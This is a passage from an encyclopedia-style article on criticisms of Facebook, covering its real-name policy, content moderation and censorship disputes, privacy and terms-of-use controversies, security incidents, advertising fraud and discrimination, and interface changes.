Facebook has a real-name system policy for user profiles. The real-name policy stems from the position "that way, you always know who you're connecting with. This helps keep our community safe."[16] The real-name system does not allow adopted names or pseudonyms,[361] and in its enforcement has suspended accounts of legitimate users, until the user provides identification indicating the name.[362] Facebook representatives have described these incidents as very rare.[362] A user claimed responsibility via the anonymous Android and iOS app Secret for reporting "fake names" which caused user profiles to be suspended, specifically targeting the stage names of drag queens.[363] On October 1, 2014, Chris Cox, Chief Product Officer at Facebook, offered an apology: "In the two weeks since the real-name policy issues surfaced, we've had the chance to hear from many of you in these communities and understand the policy more clearly as you experience it. We've also come to understand how painful this has been. We owe you a better service and a better experience using Facebook, and we're going to fix the way this policy gets handled so everyone affected here can go back to using Facebook as you were."[364]

On December 15, 2015, Facebook announced in a press release[365] that it would be providing a compromise to its real name policy after protests from groups such as the gay/lesbian community and abuse-victims.[366] The site is developing a protocol that will allow members to provide specifics as to their "special circumstance" or "unique situation" with a request to use pseudonyms, subject to verification of their true identities. At that time, this was already being tested in the U.S. Product manager Todd Gage and vice president of global operations Justin Osofsky also promised a new method for reducing the number of members who must go through ID verification while ensuring the safety of others on Facebook. The fake name reporting procedure will also be modified, forcing anyone who makes such an allegation to provide specifics that would be investigated and giving the accused individual time to dispute the allegation.[367]

Deleting users' statuses

There have been complaints of user statuses being mistakenly or intentionally deleted for alleged violations of Facebook's posting guidelines. Especially for non-English speaking writers, Facebook does not have a proper support system to genuinely read the content and make decisions. Sometimes the content of a status did not have any "abusive" or defaming language, but it nevertheless got deleted on the basis that it had been secretly reported by a group of people as "offensive". For other languages than English, Facebook till now is not able to identify the group approach that is used to vilify humanitarian activism. In another incident, Facebook had to apologize after it deleted a free speech group's post about the abuse of human rights in Syria. In that case, a spokesman for Facebook said the post was "mistakenly" removed by a member of its moderation team, which receives a high volume of take-down requests.[368]

Enabling of harassment

Facebook instituted a policy by which it is now self-policed by the community of Facebook users. Some users have complained that this policy allows Facebook to empower abusive users to harass them by allowing them to submit reports on even benign comments and photos as being "offensive" or "in violation of Facebook Rights and Responsibilities" and that enough of these reports result in the user who is being harassed in this way getting their account blocked for a predetermined number of days or weeks, or even deactivated entirely.[369]

Facebook UK policy director Simon Milner told Wired Magazine that "Once the piece of content has been seen, assessed and deemed OK, (Facebook) will ignore further reports about it."[370]

Lack of customer support

Facebook lacks live support, making it difficult to resolve issues that require the services of an administrator or are not covered in the FAQs, such as the enabling of a disabled account. The automated emailing system used when filling out a support form often refers users back to the help center or to pages that are outdated and cannot be accessed, leaving users at a dead end with no further support available. Further a person who lost access to Facebook has no easy way to find an EMAIL to contact the company regarding an account deletion.[371]

Downtime and outages

Facebook has had a number of outages and downtime large enough to draw some media attention. A 2007 outage resulted in a security hole that enabled some users to read other users' personal mail.[372] In 2008, the site was inaccessible for about a day, from many locations in many countries.[373] In spite of these occurrences, a report issued by Pingdom found that Facebook had less downtime in 2008 than most social-networking websites.[374] On September 16, 2009, Facebook started having major problems with loading when people signed in. On September 18, 2009, Facebook went down for the second time in 2009, the first time being when a group of hackers were deliberately trying to drown out a political speaker who had social networking problems from continuously speaking against the Iranian election results.[375]

In October 2009, an unspecified number of Facebook users were unable to access their accounts for over three weeks.[376][377][378][379]

Tracking cookies

Facebook has been criticized heavily for 'tracking' users, even when logged out of the site. Australian technologist Nik Cubrilovic discovered that when a user logs out of Facebook, the cookies from that login are still kept in the browser, allowing Facebook to track users on websites that include "social widgets" distributed by the social network. Facebook has denied the claims, saying they have 'no interest' in tracking users or their activity. They also promised after the discovery of the cookies that they would remove them, saying they will no longer have them on the site. A group of users in the United States have sued Facebook for breaching privacy laws.[380]

As of December 2015, to comply with a court order citing violations of the European Union Directive on Privacy and Electronic Communications—which requires users to consent to tracking and storage of data by websites, Facebook no longer allows users in Belgium to view any content on the service, even public pages, without being registered and logged in.[381]

Email address change

In June 2012, Facebook removed all existing email addresses from user profiles, and added a new @facebook.com email address. Facebook claimed this was part of adding a "new setting that gives people the choice to decide which addresses they want to show on their timelines". However, this setting was redundant to the existing "Only Me" privacy setting which was already available to hide addresses from timelines. Users complained the change was unnecessary, they did not want an @facebook.com email address, and they did not receive adequate notification their profiles had been changed.[382] The change in email address was synchronized to phones due to a software bug, causing existing email addresses details to be deleted.[383] The facebook.com email service was retired in February 2014.[384]

Safety Check bug

On March 27, 2016, following a bombing in Lahore, Pakistan, Facebook activated its "Safety Check" feature, which allows people to let friends and loved ones know they are okay following a crisis or natural disaster, to people who were never in danger, or even close to the Pakistan explosion. Some users as far as the US, UK and Egypt received notifications asking if they were okay.[385][386]

Censorship

The warning box that appears when Internet users try to view censored or blocked content on Facebook

Search function

Facebook's search function has been accused of preventing users from searching for certain terms. Michael Arrington of TechCrunch has written about Facebook's possible censorship of "Ron Paul" as a search term. MoveOn.org's Facebook group for organizing protests against privacy violations could for a time not be found by searching. The very word privacy was also restricted.[387]

Censorship of conservative news

In May 2016, Facebook was accused by a former employee for leaving out conservative topics from the trending bar.[388] Although Facebook denied these allegations, the site planned to improve the trending bar.[389]

In August 2018, Facebook deleted videos posted to it by PragerU. Facebook later reversed its decision and restored the PragerU content, saying that PragerU content was falsely reported to have hate speech.[390][391]

As a result of perception that conservatives are not treated neutrally on Facebook alternative social media platforms have been established.[392] This perception has led to a reduction of trust in Facebook, and reduction of usage by those who consider themselves to be conservative.[393]

In July of 2020, Congressman Matt Gaetz filed a criminal referral against Facebook citing that evidence produced by Project Veritas demonstrated that Facebook CEO, Mark Zuckerberg, had made materially false statements to congress while under oath in hearings which occurred in April of 2018.[394][395] Congressman Gaetz claimed that the evidence provided demonstrated that Zuckerberg's claims that the website did not engage in bias against conservative speech were false.[394]

Competing social networks

In October 2018, Facebook and Facebook Messenger was said to be blocking urls to minds.com, a social network website that is a competitor of Facebook.[396] Users have complained that Facebook marks links to Facebook's competitor as "insecure" and have to fill a captcha to share it with other users. In 2015, Facebook was accused of banning rival network Tsu.co in a similar manner.[397]

Content critical of Facebook

Newspapers regularly report stories of users who claim they've been censored on Facebook for being critical of Facebook itself, with their posts removed or made less visible. Examples include Elizabeth Warren in 2019[398] and Rotem Shtarkman in 2016.[399]

Facebook has systems to monitor specific terms and keywords and trigger automatic or semi-automatic action.[400] In the context of media reports[401] and lawsuits[402] from people formerly working on Facebook content moderation, a former employee has claimed that specific rules existed to monitor and sometimes target posts about Facebook which are anti-Facebook or criticize Facebook for some action, for instance by matching the keywords "Facebook" or "DeleteFacebook".

Image censorship

Facebook has a policy of removing photos which they believe violate the terms and conditions of the website. Images have been removed from user pages on topics such as breastfeeding,[403] nudes in art, apparent breasts, naked mannequins,[404] kisses between persons of the same sex and family photos.[405]

In September 2016, Norwegian author Tom Egeland published Nick Ut's iconic napalm girl photo on his Facebook page. He was banned for publishing "a picture of a nude child". A few weeks later, the newspaper Aftenposten published an open letter to Zuckerberg after the banning of "Napalm Girl", a Pulitzer Prize-winning documentary photograph from the Vietnam War made by Nick Ut.[406] Half of the ministers in the Norwegian government shared the famous Nick Ut photo on their Facebook pages, among them prime minister Erna Solberg from the Conservative Party (Høyre). But after only a few hours, several of the Facebook posts, including the Prime Minister's post, were deleted by Facebook.[407]

As a reaction to the letter, Facebook reconsidered its opinion on this picture and republished it, recognizing "the history and global importance of this image in documenting a particular moment in time".[408]

Breastfeeding photos

Facebook has been repeatedly criticized for removing photos uploaded by mothers breastfeeding their babies.[409] Although photos that show an exposed breast violate Facebook's decency code, even when the baby covered the nipple, Facebook took several days to respond to criticism and deactivate a paid advertisement for a dating service that used a photo of a topless model.[410]

The breastfeeding photo controversy continued following public protests and the growth in membership of a Facebook group titled "Hey, Facebook, breastfeeding is not obscene! (Official petition to Facebook)."[409] In December 2011, Facebook removed photos of mothers breastfeeding and after public criticism, restored the photos. The company said it removed the photos they believed violated the pornographic rules in the company's terms and conditions.[410] During February 2012, the company renewed its policy of removing photos of mothers breastfeeding. Founders of a Facebook group "Respect the Breast" reported that "women say they are tired of people lashing out at what is natural and what they believe is healthy for their children."[411]

Censorship of editorial content

On February 4, 2010, a number of Facebook groups against the Democratic Alliance for the Betterment and Progress of Hong Kong (DAB) were removed without any reason given.[412] The DAB is one of the largest pro-Beijing political parties in Hong Kong. The affected groups have since been restored.

Censorship of the word "moskal"

Around July 1, 2015 Facebook started to automatically ban accounts that use the word "moskal", which is a widely used historical slang term for people of Russia (formerly Moskovia until 1721), which may be seen as offensive by some individuals. However, use of similar words such as "khokhol", which are widely used by Russian nationalists against Ukrainians, as well as insulting uses of "ukrop" (literally dill), were not prosecuted. In an experiment, journalist Max Kononenko has posted the poem "Моя родословная" by Alexander Pushkin for this account to be banned automatically within minutes.[413] Posts of vice minister of Roskomnadzor, Max Ksenzov, were similarly automatically deleted.[414][415][416] Ksenzov has accused Facebook of censorship and double standards and has removed his account in protest.

Censorship on the Kashmir Freedom Movement

In 2016, Facebook banned and also removed content regarding the Kashmir dispute, triggering a response from The Guardian, BBC and other media groups on Facebook's policies on censorship.[417][418] Facebook censorship policies have been criticized especially after the company banned the posts about the Indian army's attack on protesters, including children, with pellet guns.[419] A human rights group superimposed pellet injuries similar to those inflicted on Kashmiri people on the faces of popular Indian actors, famous people including Facebook founder Mark Zuckerberg and even Prime Minister Narendra Modi as a response, which went viral.[420][421]

Kurdish opposition censorship

Facebook has a policy to censor anything related to Kurdish opposition against Turkey, such as maps of Kurdistan, flags of Kurdish armed groups (such as PKK and YPG), and criticism of Mustafa Kemal Atatürk, the founder of Turkey.[422][423]

Censorship of 'blasphemous' content

Facebook has worked with Pakistani government to censor 'blasphemous' pages and speech inside Pakistan.[424]

Censorship of anti-immigrant speech

In Germany, Facebook actively censors anti-immigrant speech.[425][426][427]

In May 2016, Facebook and other technology companies agreed to a new "code of conduct" by the European Commission to review hateful online content within 24 hours of being notified, and subsequently remove such content if necessary.[428][429][430] A year later, Reuters reported that the European Union had approved proposals to make Facebook and other technology companies tackle hate speech content on their platforms, but that a final agreement in the European Parliament is needed to make the proposals into law.[431][432] In June 2017, the European Commission praised Facebook's efforts in fighting hateful content, having reviewed "nearly 58 percent of flagged content within 24 hours".[433][434]

Third-party responses to Facebook

Government censorship

Several countries have banned access to Facebook, including Syria,[435] China,[436] and Iran.[437] In 2010, the Office of the Data Protection Supervisor, a branch of the government of the Isle of Man, received so many complaints about Facebook that they deemed it necessary to provide a "Facebook Guidance" booklet (available online as a PDF file), which cited (amongst other things) Facebook policies and guidelines and included an elusive Facebook telephone number. This number when called, however, proved to provide no telephone support for Facebook users, and only played back a recorded message advising callers to review Facebook's online help information.[438]

In 2010, Facebook reportedly allowed an objectionable page, deemed by the Islamic Lawyers Forum (ILF), to be anti-Muslim. The ILF filed a petition with Pakistan's Lahore High Court. On May 18, 2010, Justice Ijaz Ahmad Chaudhry ordered Pakistan's Telecommunication Authority to block access to Facebook until May 31. The offensive page had provoked street demonstrations in Muslim countries due to visual depictions of Prophet Mohammed, which are regarded as blasphemous by Muslims.[439][440] A spokesman said Pakistan Telecommunication Authority would move to implement the ban once the order has been issued by the Ministry of Information and Technology. "We will implement the order as soon as we get the instructions", Khurram Mehran told AFP. "We have already blocked the URL link and issued instruction to Internet service providers yesterday", he added. Rai Bashir told AFP that "We moved the petition in the wake of widespread resentment in the Muslim community against the Facebook contents". The petition called on the government of Pakistan to lodge a strong protest with the owners of Facebook, he added. Bashir said a PTA official told the judge his organization had blocked the page, but the court ordered a total ban on the site. People demonstrated outside court in the eastern city of Lahore, Pakistan, carrying banners condemning Facebook. Protests in Pakistan on a larger scale took place after the ban and widespread news of that objectionable page. The ban was lifted on May 31 after Facebook reportedly assured the Lahore High Court that it would remedy the issues in dispute.[441][442][443]

In 2011, a court in Pakistan was petitioned to place a permanent ban on Facebook for hosting a page called "2nd Annual Draw Muhammad Day May 20th 2011".[444][445]

Organizations blocking access

Ontario government employees, Federal public servants, MPPs, and cabinet ministers were blocked from access to Facebook on government computers in May 2007.[446] When the employees tried to access Facebook, a warning message "The Internet website that you have requested has been deemed unacceptable for use for government business purposes". This warning also appears when employees try to access YouTube, MySpace, gambling or pornographic websites.[447] However, innovative employees have found ways around such protocols, and many claim to use the site for political or work-related purposes.[448]

A number of local governments including those in the UK[449] and Finland[450] imposed restrictions on the use of Facebook in the workplace due to the technical strain incurred. Other government-related agencies, such as the US Marine Corps have imposed similar restrictions.[451] A number of hospitals in Finland have also restricted Facebook use citing privacy concerns.[452][453]

Schools blocking access

The University of New Mexico (UNM) in October 2005 blocked access to Facebook from UNM campus computers and networks, citing unsolicited emails and a similar site called UNM Facebook.[454] After a UNM user signed into Facebook from off campus, a message from Facebook said, "We are working with the UNM administration to lift the block and have explained that it was instituted based on erroneous information, but they have not yet committed to restore your access." UNM, in a message to students who tried to access the site from the UNM network, wrote, "This site is temporarily unavailable while UNM and the site owners work out procedural issues. The site is in violation of UNM's Acceptable Computer Use Policy for abusing computing resources (e.g., spamming, trademark infringement, etc.). The site forces use of UNM credentials (e.g., NetID or email address) for non-UNM business." However, after Facebook created an encrypted login and displayed a precautionary message not to use university passwords for access, UNM unblocked access the following spring semester.[455]

The Columbus Dispatch reported on June 22, 2006, that Kent State University's athletic director had planned to ban the use of Facebook by athletes and gave them until August 1 to delete their accounts.[456] On July 5, 2006, the Daily Kent Stater reported that the director reversed the decision after reviewing the privacy settings of Facebook.

Closed social networks

Several web sites concerned with social networking, such as Plugtodo.com and Salesforce.com have criticized the lack of information that users get when they share data. Advanced users cannot limit the amount of information anyone can access in their profiles, but Facebook promotes the sharing of personal information for marketing purposes, leading to the promotion of the service using personal data from users who are not fully aware of this. Facebook exposes personal data, without supporting open standards for data interchange.[457] According to several communities[458] and authors[459] closed social networking, on the other hand, promotes data retrieval from other people while not exposing one's personal information.

Openbook was established in early 2010 both as a parody of Facebook and a critique of its changing privacy management protocols.[460]

Litigation

Terms of use controversy

While Facebook originally made changes to its terms of use[461] or, terms of service, on February 4, 2009, the changes went unnoticed until Chris Walters, a blogger for the consumer-oriented blog, The Consumerist, noticed the change on February 15, 2009.[462] Walters complained the change gave Facebook the right to "Do anything they want with your content. Forever."[463] The section under the most controversy is the "User Content Posted on the Site" clause. Before the changes, the clause read:

You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content.[461]

The "license granted" refers to the license that Facebook has to one's "name, likeness, and image" to use in promotions and external advertising.[461] The new terms of use deleted the phrase that states the license would "automatically expire" if a user chose to remove content. By omitting this line, Facebook license extends to adopt users' content perpetually and irrevocably years after the content has been deleted.[462]

Many users of Facebook voiced opinions against the changes to the Facebook Terms of Use, leading to an Internet-wide debate over the ownership of content. The Electronic Privacy Information Center (EPIC) prepared a formal complaint with the Federal Trade Commission. Many individuals were frustrated with the removal of the controversial clause. Facebook users, numbering more than 38,000, joined a user group against the changes, and a number of blogs and news sites have written about this issue.[462]

After the change was brought to light in Walters's blog entry, in his blog on February 16, 2009, Zuckerberg addressed the issues concerning the recently made changes to Facebook's terms of use. Zuckerberg wrote "Our philosophy is that people own their information and control who they share it with."[464] In addition to this statement Zuckerberg explained the paradox created when people want to share their information (phone number, pictures, email address, etc.) with the public, but at the same time desire to remain in complete control of who has access to this info.[465]

To calm criticism, Facebook returned to its original terms of use. However, on February 17, 2009, Zuckerberg wrote in his blog, that although Facebook reverted to its original terms of use, it is in the process of developing new terms to address the paradox. Zuckerberg stated that these new terms will allow Facebook users to "share and control their information, and it will be written clearly in language everyone can understand." Zuckerberg invited users to join a group entitled "Facebook Bill of Rights and Responsibilities" to give their input and help shape the new terms.

On February 26, 2009, Zuckerberg posted a blog, updating users on the progress of the new Terms of Use. He wrote, "We decided we needed to do things differently and so we're going to develop new policies that will govern our system from the ground up in an open and transparent way." Zuckerberg introduces the two new additions to Facebook: the Facebook Principles[466] and the Statement of Rights and Responsibilities.[467] Both additions allow users to vote on changes to the terms of use before they are officially released. Because "Facebook is still in the business of introducing new and therefore potentially disruptive technologies", Zuckerberg explains, users need to adjust and familiarize themselves with the products before they can adequately show their support.[468]

This new voting system was initially applauded as Facebook's step to a more democratized social network system.[469] However, the new terms were harshly criticized in a report by computer scientists from the University of Cambridge, who stated that the democratic process surrounding the new terms is disingenuous and significant problems remain in the new terms.[470] The report was endorsed by the Open Rights Group.[471]

In December 2009, EPIC and a number of other U.S. privacy organizations filed another complaint[472] with the Federal Trade Commission (FTC) regarding Facebook's Terms of Service. In January 2011 EPIC filed a subsequent complaint[473] claiming that Facebook's new policy of sharing users' home address and mobile phone information with third-party developers were "misleading and fail[ed] to provide users clear and privacy protections", particularly for children under age 18.[474] Facebook temporarily suspended implementation of its policy in February 2011, but the following month announced it was "actively considering" reinstating the third-party policy.[475]

Interoperability and data portability

Facebook has been criticized for failing to offer users a feature to export their friends' information, such as contact information, for use with other services or software. The inability of users to export their social graph in an open standard format contributes to vendor lock-in and contravenes the principles of data portability.[476] Automated collection of user information without Facebook's consent violates its Statement of Rights and Responsibilities,[477] and third-party attempts to do so (e.g., Web scraping) have resulted in litigation, Power.com.

Facebook Connect has been criticized for its lack of interoperability with OpenID.[478]

Lawsuits over privacy

Facebook’s strategy of making revenue through advertising has created a lot of controversy for its users as some argue that it is "a bit creepy… but it is also brilliant."[479] Some Facebook users have raised privacy concerns because they do not like that Facebook sells user’s information to third parties. In 2012, users sued Facebook for using their pictures and information on a Facebook advertisement.[480] Facebook gathers user information by keeping track of pages users have "Liked" and through the interactions users have with their connections.[481] They then create value from the gathered data by selling it.[481] In 2009 users also filed a lawsuit for Facebook’s privacy invasion through the Facebook Beacon system. Facebook’s team believed that through the Beacon system people could inspire their friends to buy similar products, however, users did not like the idea of sharing certain online purchases with their Facebook friends.[482] Users were against Facebook’s invasion of privacy and sharing that privacy with the world. Facebook users became more aware of Facebook’s behavior with user information in 2009 as Facebook launched their new Terms of Service. In Facebook’s terms of service, Facebook admits that user information may be used for some of Facebook’s own purposes such as sharing a link to your posted images or for their own commercials and advertisements.[483]

As Dijck argues in his book that, "the more users know about what happens to their personal data, the more inclined they are to raise objections."[481] This created a battle between Facebook and Facebook users described as the "battle for information control."[481] Facebook users have become aware of Facebook’s intentions and people now see Facebook "as serving the interests of companies rather than its users."[484] In response to Facebook selling user information to third parties, concerned users have resorted to the method of "Obfuscation."[485] Through obfuscation users can purposely hide their real identity and provide Facebook with false information that will make their collected data less accurate.[485] By obfuscating information through sites such as "FaceCloak," Facebook users have regained control of their personal information.[485]

Better Business Bureau review

As of December 2010, the Better Business Bureau gave Facebook an "A" rating.[486][487]

As of December 2010, the 36-month running count of complaints about Facebook logged with the Better Business Bureau is 1136, including 101 ("Making a full refund, as the consumer requested"), 868 ("Agreeing to perform according to their contract"), 1 ("Refuse [sic] to adjust, relying on terms of agreement"), 20 ("Unassigned"), 0 ("Unanswered") and 136 ("Refusing to make an adjustment").[486]

Security

Facebook's software has proven vulnerable to likejacking. On July 28, 2010, the BBC reported that security consultant Ron Bowes used a piece of code to scan Facebook profiles to collect data of 100 million profiles. The data collected was not hidden by the user's privacy settings. Bowes then published the list online. This list, which has been shared as a downloadable file, contains the URL of every searchable Facebook user's profile, their name and unique ID. Bowes said he published the data to highlight privacy issues, but Facebook claimed it was already public information.[488]

In early June 2013, The New York Times reported that an increase in malicious links related to the Trojan horse malware program Zeus were identified by Eric Feinberg, founder of the advocacy group Fans Against Kounterfeit Enterprise (FAKE). Feinberg said that the links were present on popular NFL Facebook fan pages and, following contact with Facebook, was dissatisfied with the corporation's "after-the-fact approach". Feinberg called for oversight, stating, "If you really want to hack someone, the easiest place to start is a fake Facebook profile—it's so simple, it's stupid."[489]

Rewards for vulnerability reporting

On August 19, 2013, it was reported that a Facebook user from Palestinian Autonomy, Khalil Shreateh, found a bug that allowed him to post material to other users' Facebook Walls. Users are not supposed to have the ability to post material to the Facebook Walls of other users unless they are approved friends of those users that they have posted material to. To prove that he was telling the truth, Shreateh posted material to Sarah Goodin's wall, a friend of Facebook CEO Mark Zuckerberg. Following this, Shreateh contacted Facebook's security team with the proof that his bug was real, explaining in detail what was going on. Facebook has a bounty program in which it compensates people a $500+ fee for reporting bugs instead of using them to their advantage or selling them on the black market. However, it was reported that instead of fixing the bug and paying Shreateh the fee, Facebook originally told him that "this was not a bug" and dismissed him. Shreateh then tried a second time to inform Facebook, but they dismissed him yet again. On the third try, Shreateh used the bug to post a message to Mark Zuckerberg's Wall, stating "Sorry for breaking your privacy ... but a couple of days ago, I found a serious Facebook exploit" and that Facebook's security team was not taking him seriously. Within minutes, a security engineer contacted Shreateh, questioned him on how he performed the move and ultimately acknowledged that it was a bug in the system. Facebook temporarily suspended Shreateh's account and fixed the bug after several days. However, in a move that was met with much public criticism and disapproval, Facebook refused to pay out the 500+ fee to Shreateh; instead, Facebook responded that by posting to Zuckerberg's account, Shreateh had violated one of their terms of service policies and therefore "could not be paid." Included with this, the Facebook team strongly censured Shreateh over his manner of resolving the matter. In closing, they asked that Shreateh continue to help them find bugs.[490][491][492]

On August 22, 2013, Yahoo News reported that Marc Maiffret, a chief technology officer of the cybersecurity firm BeyondTrust, is prompting hackers to help raise a $10,000 reward for Khalil Shreateh. On August 20, Maiffret stated that he had already raised $9,000 in his efforts, including the $2,000 he himself contributed. He and other hackers alike have denounced Facebook for refusing Shreateh compensation. Maiffret said: "He is sitting there in Palestine doing this research on a five-year-old laptop that looks like it is half broken. It's something that might help him out in a big way." Facebook representatives have since responded, "We will not change our practice of refusing to pay rewards to researchers who have tested vulnerabilities against real users." Facebook representatives also claimed they'd paid out over $1 million to individuals who have discovered bugs in the past.[493]

Environmental impacts

In 2010, Prineville, Oregon, was chosen as the site for Facebook's new data center.[494] However, the center has been met with criticism from environmental groups such as Greenpeace because the power utility company contracted for the center, PacifiCorp, generates 60% of its electricity from coal.[495][496][497] In September 2010, Facebook received a letter from Greenpeace containing half a million signatures asking the company to cut its ties to coal-based electricity.[498]

On April 21, 2011, Greenpeace released a report showing that of the top ten big brands in cloud computing, Facebook relied the most on coal for electricity for its data centers. At the time, data centers consumed up to 2% of all global electricity and this amount was projected to increase. Phil Radford of Greenpeace said "we are concerned that this new explosion in electricity use could lock us into old, polluting energy sources instead of the clean energy available today".[499]

On December 15, 2011, Greenpeace and Facebook announced together that Facebook would shift to use clean and renewable energy to power its own operations. Marcy Scott Lynn, of Facebook's sustainability program, said it looked forward "to a day when our primary energy sources are clean and renewable" and that the company is "working with Greenpeace and others to help bring that day closer".[500][501]

Advertising

Click fraud

In July 2012, startup Limited Run claimed that 80% of its Facebook clicks came from bots.[502][503][504] Limited Run co-founder Tom Mango told TechCrunch that they "spent roughly a month testing this" with six web analytics services including Google Analytics and in-house software.[502] Click fraud (Allege reason) Limited Run said it came to the conclusion that the clicks were fraudulent after running its own analysis. It determined that most of the clicks for which Facebook was charging it came from computers that weren’t loading Javascript, a programming language that allows Web pages to be interactive. Almost all Web browsers load Javascript by default, so the assumption is that if a click comes from one that isn’t, it’s probably not a real person but a bot.[505]

Like fraud

Facebook offers an advertising tool for pages to get more "likes".[506] According to Business Insider, this advertising tool is called "Suggested Posts" or "Suggested Pages", allowing companies to market their page to thousands of new users for as little as $50.[507]

Global Fortune 100 firms are increasingly using social media marketing tools as the number of "likes" per Facebook page has risen by 115% globally.[508] Biotechnology company Comprendia investigated Facebook’s "likes" through advertising by analyzing the life science pages with the most likes. They concluded that at as much as 40% of "likes" from company pages are suspected to be fake.[509] According to Facebook’s annual report, an estimated 0.4% and 1.2% of active users are undesirable accounts that create fake likes.[510]

Small companies such as PubChase have publicly testified against Facebook’s advertising tool, claiming legitimate advertising on Facebook creates fraudulent Facebook "likes". In May 2013, PubChase decided to build up its Facebook following through Facebook’s advertising tool, which promises to "connect with more of the people who matter to you". After the first day, the company grew suspicious of the increased likes as they ended up with 900 likes from India. According to PubChase, none of the users behind the "likes" seemed to be scientists. The statistics from Google Analytics indicate that India is not in the company’s main user base. PubChase continues by stating that Facebook has no interface to delete the fake likes; rather, the company must manually delete each follower themselves.[511]

In February 2014, Derek Muller used his YouTube account Veritasium to upload a video titled "Facebook Fraud". Within three days, the video had gone viral with more than a million views (it has reached 2,521,614 views as of June 10, 2014). In the video, Muller illustrates how after paying US$50 to Facebook advertising, the "likes" to his fan page have tripled in a few days and soon reached 70,000 "likes", compared to his original 2,115 likes before the advertising. Despite the significant increase in likes, Muller noticed his page has actually decreased in engagement – there were fewer people commenting, sharing, and liking his posts and updates despite the significant increase in "likes". Muller also noticed that the users that "liked" his page were users that liked hundreds of other pages, including competing pages such as AT&T and T-Mobile. He theorizes that users are purposely clicking "like" on any and every page to deter attention away from the pages they were paid to "like". Muller claims, "I never bought fake likes, I used Facebook legitimate advertising, but the results are as if I paid for fake likes from a click farm".[512]

In response to the fake "likes" complaints, Facebook told Business Insider:

We're always focused on maintaining the integrity of our site, but we've placed an increased focus on abuse from fake accounts recently. We've made a lot of progress by building a combination of automated and manual systems to block accounts used for fraudulent purposes and Like button clicks. We also take action against sellers of fake clicks and help shut them down.[507]

Undesired targeting

On August 3, 2007, several British companies, including First Direct, Vodafone, Virgin Media, The Automobile Association, Halifax and Prudential pulled advertising in Facebook after finding that their ads were displayed on the page of the British National Party, a far-right political party.[513]

Facilitation of housing discrimination

Facebook has faced allegations that its advertising platforms facilitate housing discrimination by means of internal functions for targeted advertising, which allowed advertisers to target or exclude specific audiences from campaigns.[514][515][516] Researchers have also found that Facebook's advertising platform may be inherently discriminatory, since ad delivery is also influenced by how often specific demographics interact with specific types of advertising—even if they are not explicitly determined by the advertiser.[517]

Under the United States' Fair Housing Act, it is illegal to show a preference for or against tenants based on specific protected classes (including race, ethnicity, and disabilities), when advertising or negotiating the rental or sale of housing. In 2016, ProPublica found that advertisers could target or exclude users from advertising based on an "Ethnic Affinity"—a demographic trait which is determined based on a user's interests and behaviors on Facebook, and not explicitly provided by the user. This could, in turn, be used to discriminate based on race.[518] In February 2017, Facebook stated that it would implement stronger measures to forbid discriminatory advertising across the entire platform. Advertisers who attempt to create ads for housing, employment, or credit (HEC) opportunities would be blocked from using ethnic affinities (renamed "multicultural affinities" and now classified as behaviors) to target the ad. If an advertiser uses any other audience segment to target ads for HEC, they would be informed of the policies, and be required to affirm their compliance with relevant laws and policies.[519]

However, in November 2017, ProPublica found that automated enforcement of these new policies was inconsistent. They were also able to successfully create housing ads that excluded users based on interests and other factors that effectively imply associations with protected classes, including interests in wheelchair ramps, the Spanish-language television network Telemundo, and New York City ZIP codes with majority minority populations. In response to the report, Facebook temporarily disabled the ability to target any ad with exclusions based on multicultural affinities.[514][516]

In April 2018, Facebook permanently removed the ability to create exclusions based on multicultural affinities. In July 2018, Facebook signed a legally binding agreement with the State of Washington to take further steps within 90 days to prevent the use of its advertising platform for housing discrimination against protected classes.[520] The following month, Facebook announced that it would remove at least 5,000 categories from its exclusion system to prevent "misuse", including those relating to races and religions.[521] On March 19, 2019, Facebook settled a lawsuit over the matter with the National Fair Housing Alliance, agreeing to create a separate portal for HEC advertising with limited targeting options by September 2019, and to provide a public archive of all HEC advertising.[522][523]

On March 28, 2019, the U.S. Department of Housing and Urban Development (HUD) filed a lawsuit against Facebook, having filed a formal complaint against the company on August 13, 2018. The HUD also took issue with Facebook's tendency to deliver ads based on users having "particular characteristics [that are] most likely to engage with the ad".[524][515]

Fake accounts

In August 2012, Facebook revealed that more than 83 million Facebook accounts (8.7% of total users) are fake accounts.[525] These fake profiles consist of duplicate profiles, accounts for spamming purposes and personal profiles for business, organization or non-human entities such as pets.[526] As a result of this revelation, the share price of Facebook dropped below $20.[527] Furthermore, there are lots of work which try to detect fake profiles using automated means, in one such work machine learning techniques are used to detect fake users.[528]

Facebook initially refused to remove a “business” page devoted to a woman’s anus, created without her knowledge while she was underage, due to other Facebook users having expressed interest in the topic. After Buzzfeed published a story about it, the page was finally removed. The page listed her family’s former home address as that of the “business”.[529]

User interface

Upgrades

September 2008

In September 2008, Facebook permanently moved its users to what they termed the "New Facebook" or Facebook 3.0.[530] This version contained several different features and a complete layout redesign. Between July and September, users had been given the option to use the new Facebook in place of the original design,[531] or to return to the old design.

Facebook's decision to migrate their users was met with some controversy in their community. Several groups started opposing the decision, some with over a million users.[532]

October 2009

In October 2009, Facebook redesigned the news feed so that the user could view all types of things that their friends were involved with. In a statement, they said,

... your applications [stories] generate can show up in both views. The best way for your stories to appear in the News Feed filter is to create stories that are highly engaging, as high quality, interesting stories are most likely to garner likes and comments by the user's friends.[465]

This redesign was explained as:

News Feed will focus on popular content, determined by an algorithm based on interest in that story, including the number of times an item is liked or commented on. Live Feed will display all recent stories from a large number of a user's friends.[465]

The redesign was met immediately with criticism with users, many who did not like the amount of information that was coming at them. This was also compounded by the fact that people couldn't select what they saw.

November/December 2009

In November 2009, Facebook issued a proposed new privacy policy, and adopted it unaltered in December 2009. They combined this with a rollout of new privacy settings. This new policy declared certain information, including "lists of friends", to be "publicly available", with no privacy settings; it was previously possible to keep access to this information restricted. Due to this change, the users who had set their "list of friends" as private were forced to make it public without even being informed, and the option to make it private again was removed. This was protested by many people and privacy organizations such as the EFF.[533]

